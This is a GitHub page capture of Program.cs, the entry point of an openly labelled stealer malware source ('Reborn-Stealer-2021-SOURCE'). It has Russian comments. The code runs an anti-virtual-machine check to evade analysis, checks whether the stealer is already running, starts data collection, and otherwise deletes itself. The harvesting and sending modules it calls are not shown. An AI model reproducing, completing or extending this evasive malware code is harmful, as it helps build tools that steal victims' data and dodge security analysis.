forked from username2371/Reborn-Stealer-2021-SOURCE
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathProgram.cs
50 lines (49 loc) · 1.55 KB
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
using Natasha.Properties;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Windows.Forms;
namespace Reborn
{
static class Program
{
[STAThread]
static void Main()
{
try
{
if (!AntiVM.Inizialize()) // Антивиртуалка
{
if (!File.Exists(Help.DirectoryBuild + Config.ID)) // Проверка запущен ли уже стиллер
{
if (Process.GetProcessesByName(Process.GetCurrentProcess().ProcessName).Length == 1) // Проверка запущен ли уже стиллер
{
Collection.Start();
}
else
{
Sending.AutoDelete();
}
}
else
{
Sending.AutoDelete();
}
}
else
{
// Console.WriteLine("1");
Sending.AutoDelete();
}
//Console.WriteLine("Ахуеть спасиба");
}
catch (Exception e)
{
//Console.WriteLine(e + "ОХУЕТЬ, ОШИБКА ПРЯМ В ПРОГРАМ");
}
}
}
}